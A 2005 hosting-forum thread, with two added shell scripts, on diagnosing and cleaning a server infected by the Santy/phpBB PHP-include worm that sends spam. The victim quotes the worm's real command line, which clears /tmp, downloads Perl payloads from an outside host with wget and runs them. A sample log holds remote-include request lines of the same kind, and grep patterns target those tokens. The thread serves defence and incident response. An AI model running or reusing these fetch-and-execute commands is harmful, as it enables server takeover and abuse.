The Community Forums


CPU overloaded by PERL

Discussion in 'General Discussion' started by Novisoft, Jan 1, 2005.

  1. Novisoft

    Novisoft Active Member

    Hello,
    I'm having some problems since a couple of days ago, as my CPU is frequently overloaded. So sometimes the server goes down for 2 to 3 hours.

    When I use "TOP" through SSH, I can see that some processes belonging to the user "nobody" and with the command PERL are causing the current overload (see the attached picture top.gif).

    Also, when I use "WHM>System Health>Show Current CPU Usage", I can see that the processes whose owner is nobody and with the command /usr/local/apache/bin/httpd -DSSL are causing the CPU overload (see the attached picture cpu-usage.gif). When I click on the pid number and then on trace, the page is filled with hundreds of lines of "select(8, [3], NULL, NULL, {0, 0}) = 0 (Timeout)" (see the attached file trace.gif).

    The above line is repeated hundreds of times and it doesn't stop filling the page until I go back and kill the process.

    This is really causing inconvenience to me and my customers, so they are asking me about the downtime and the origin of the trouble. :(

    Can someone please help me to resolve this problem?

    Thank you in advance

    Lyes
     


  2. Novisoft

    Novisoft Active Member

    Oh, by the way, what is the perlwow.x process?
    I traced it, and here is what I get (see attached file perlwowx.txt).

    I also noticed the following line : "recvfrom(5, "`d\201\200\0\1\0\4\0\t\0\2\3www\6google\3com\2br\0\0"..., 1024, 0, {sin_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("MY.IP.ADDRESS.HERE")}}, [16]) = 341"

    So, I wonder if someone is sending spam through my server, because I found about 7700 emails in the email queue. Most of them have been sent to email addresses with something like @xxxxx.com.br.

    Hope this will help someone to help me :)

    Thanks once again

    Lyes
     


    #2 Novisoft, Jan 1, 2005
    Last edited: Jan 1, 2005
  3. chirpy

    chirpy Well-Known Member

    That very much looks like the Santy/phpBB worm in action.

    You need to secure your server, get any phpBB scripts upgraded. Install mod_security with good filters (do a search, they've been posted recently). Clean up the worm and kill the processes.

    One way of finding which processes are actually part of the worm is to use:

    lsof | grep /tmp

    Look for anything out of the ordinary (i.e. not mysql, etc.).

    If you don't know how to do the above, you should consider hiring a server administrator.
     
  4. DigitalN

    DigitalN Well-Known Member

    ls -l /proc/xxxx

    where xxxx is the PID number may tell you where the script is located.
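    The two replies above (lsof against /tmp, and ls -l on /proc/<pid>) boil down to one check: where does the process really run from, whatever name top shows for it? The script below is an added example, not something posted in this thread, that does that check from the /proc links. It assumes Linux with /proc mounted and pgrep available; reading another user's /proc entries needs root. A script started as "perl wow.x" from /tmp shows up in top as plain "perl", but its working directory and open files give it away, even after the file was deleted.

```shell
#!/bin/sh
# Added example, not from the thread: triage a process by its /proc entry
# instead of trusting the command name that top shows.
# Assumes Linux with /proc mounted; other users' entries need root to read.

# Return 0 when PATH is inside a world-writable scratch directory.
is_scratch_path() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print "pid exe cwd" for one process; "unknown" where a link is unreadable.
proc_origin() {
    p=$1
    exe=$(readlink "/proc/$p/exe" 2>/dev/null || echo unknown)
    cwd=$(readlink "/proc/$p/cwd" 2>/dev/null || echo unknown)
    printf '%s %s %s\n' "$p" "$exe" "$cwd"
}

# Return 0 (suspicious) when the process runs from a scratch directory, has
# its working directory there, or holds a file open there. A binary that was
# deleted while running still shows, as "/tmp/wow.x (deleted)".
proc_is_suspicious() {
    p=$1
    exe=$(readlink "/proc/$p/exe" 2>/dev/null || echo unknown)
    cwd=$(readlink "/proc/$p/cwd" 2>/dev/null || echo unknown)
    is_scratch_path "$exe" && return 0
    is_scratch_path "$cwd" && return 0
    for fd in "/proc/$p/fd"/*; do
        target=$(readlink "$fd" 2>/dev/null) || continue
        is_scratch_path "$target" && return 0
    done
    return 1
}

# Check every process owned by USER (default nobody) and list the suspects,
# so they can be reviewed before anything is killed.
report_user_procs() {
    user=${1:-nobody}
    for p in $(pgrep -u "$user" 2>/dev/null); do
        if proc_is_suspicious "$p"; then
            printf 'SUSPECT: '
            proc_origin "$p"
        fi
    done
}
```

    Run `report_user_procs nobody` as root on the box; each line printed is a PID with its executable and working directory, which is what you want to know before killing anything, since an Apache child with a legitimate /tmp session file open will also be listed and should be left alone.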
     
  5. Novisoft

    Novisoft Active Member

    Thank you guys for your replies.

    I located wow.x and deleted it, I killed all processes run by wow.x after stopping Apache, and I just updated PHP to 4.3.10.

    I will try to find out if there are other copies of wow.x in other directories; if yes, I'll delete them and reboot the server. Can someone tell me how I can search files by their names through SSH on Linux Red Hat?

    After that, I will check all installed PHP scripts to avoid vulnerabilities, and will also install good mod_security filters.

    If there is something I messed up, just remind me of it :)

    Thanks once again

    Lyes
     
  6. DigitalN

    DigitalN Well-Known Member

    Try

    # updatedb

    when that completes

    # locate wow.x

    or without updating the file db

    find / -name wow.x

    Those should work.

    You probably don't need to reboot the server, but you can if you want to; it won't do any harm to start up clean.
     
  7. Novisoft

    Novisoft Active Member

    Hello guys,
    I thought the problem was gone, but I just found wow.x in the /tmp directory. The hackers did something to bring back the wow files from their web site even if I delete them and kill all processes owned by perlwow.x and perl.

    Below is the command I found in the CPU usage. Can someone give me a hint to stop that :(

    sh-cecho _START_; cd /tmp;cd rm -rf *;wget http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl sess_0bc3910d07edb36750a9babbd179edb4;wget http://filepack.superbr.org/wow.f;perl wow.f;wget http://filepack.superbr.org/wow.x;perl wow.x; echo _END_

    Thank you very much

    Lyes

    PS : more information about the worm on http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php
     
  8. dezignguy

    dezignguy Well-Known Member

    Better check your Apache logs for the insecure script that the worm is getting into the server through... you can try grepping for words such as 'tmp', 'perl', 'wget' to find the lines where attempts have been made against your scripts. And then secure or remove those scripts.

    Though it's still highly recommended that you hire a competent server admin to secure your box.
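    The grep the reply above suggests, written out as an added example (not from this thread) so the hits are also grouped by the local script they were aimed at, which is the script that needs fixing or removing. It assumes the Apache access log is in the usual Common/Combined Log Format, where the request path is the seventh field. The sample log lines are constructed for the demonstration; the script names, addresses and the example.invalid host are made up, not taken from any real log.

```shell
#!/bin/sh
# Added example, not from the thread: scan an Apache access log for the
# request pattern a PHP remote-include worm leaves behind, then rank the
# local scripts that were targeted.
# Assumes Common/Combined Log Format: field 7 of each line is the request path.

# Print the log lines whose request passes a remote URL in a query parameter
# (the remote-include itself), or carries the tokens the reply above suggests
# grepping for: tmp, perl, wget.
scan_access_log() {
    grep -E -i '[?&][^ ]*=(https?|ftp)://|wget|perl|/tmp' "$1"
}

# From the same log, count the distinct local scripts that were hit, most
# frequent first. The script at the top of the list is the one to secure.
targeted_scripts() {
    scan_access_log "$1" \
      | awk '{ split($7, p, "?"); print p[1] }' \
      | sort | uniq -c | sort -rn
}

# Write a constructed sample log to FILE so the functions can be tried offline.
# Addresses, script names and the example.invalid host are made up.
write_sample_log() {
    cat > "$1" <<'EOF'
198.51.100.7 - - [01/Jan/2005:03:12:45 +0000] "GET /index.php?page=3 HTTP/1.1" 200 5123
198.51.100.9 - - [01/Jan/2005:03:13:01 +0000] "GET /gallery/view.php?inc=http://example.invalid/cmd.txt?&cmd=cd%20/tmp;wget%20http://example.invalid/wow.x;perl%20wow.x HTTP/1.1" 200 812
198.51.100.7 - - [01/Jan/2005:03:14:10 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9870
198.51.100.9 - - [01/Jan/2005:03:15:33 +0000] "GET /gallery/view.php?inc=http://example.invalid/cmd.txt?&cmd=id HTTP/1.1" 200 640
EOF
}

# Stand-alone demonstration on the constructed sample.
sample=$(mktemp)
write_sample_log "$sample"
echo "== matching requests =="
scan_access_log "$sample"
echo "== targeted scripts =="
targeted_scripts "$sample"
rm -f "$sample"
```

    Against a real server the call is `targeted_scripts /usr/local/apache/logs/access_log` (and the per-domain logs under /usr/local/apache/domlogs on a cPanel box). The URL-in-parameter pattern is the reliable one; the bare words "perl" and "tmp" will also match legitimate paths, so read the matched lines rather than acting on the count alone.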
     
  9. casey

    casey Well-Known Member

    Until you can get a handle on everything, you should do

    chmod 700 /usr/bin/wget

    That way they won't be able to put the files back into tmp again for the time being.
     